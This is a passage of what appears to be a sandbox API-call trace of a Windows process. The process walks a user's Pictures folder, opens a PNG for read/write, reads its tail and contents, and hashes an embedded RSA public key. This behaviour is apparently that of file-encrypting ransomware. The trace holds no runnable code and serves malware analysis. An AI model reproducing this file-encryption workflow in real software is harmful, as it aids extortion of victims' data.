hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2b709b0, ftCreationTime.dwHighDateTime=0x1d8a613, ftLastAccessTime.dwLowDateTime=0x4660df40, ftLastAccessTime.dwHighDateTime=0x1d8a65e, ftLastWriteTime.dwLowDateTime=0x4660df40, ftLastWriteTime.dwHighDateTime=0x1d8a65e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yDPh4CpXgP3QwyUC", cAlternateFileName="YDPH4C~1")) returned 1 [0199.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0199.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0199.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2e95c90 [0199.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0199.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91840 [0199.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e918d8 [0199.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0199.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0199.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0199.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e917a8 | out: hHeap=0x620000) returned 1 [0199.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0199.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0199.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e917a8 [0199.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0199.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.622] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf929b0, ftCreationTime.dwHighDateTime=0x1d8a73b, ftLastAccessTime.dwLowDateTime=0xcef659b0, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xcef659b0, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0xf6d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yOmL -Z4 9fyb2IF7S9.png", cAlternateFileName="YOML-Z~1.PNG")) returned 1 [0199.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0199.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0199.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0199.622] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yOmL -Z4 9fyb2IF7S9.png") returned=".png" [0199.622] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yOmL -Z4 9fyb2IF7S9.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\yoml -z4 9fyb2if7s9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.623] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=63188) returned 1 [0199.623] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.625] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xf6ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.625] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.628] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.628] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xf6d4, lpOverlapped=0x0) returned 1 [0199.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.629] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.630] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.631] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.631] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.631] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.631] GetLastError () returned 0x0 [0199.631] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.631] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.631] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.631] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.631] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf6d0) returned 0x2ea79b0 [0199.632] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f588 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f5d0 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31a0 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.633] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31e8 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea31d0 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.635] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.638] GetCurrentThreadId () returned 0x66c [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6850 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.639] GetCurrentThreadId () returned 0x66c [0199.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31e8 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3248 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3260 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3200 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31d0 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f5d0 | out: hHeap=0x620000) returned 1 [0199.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.651] HeapFree (in: 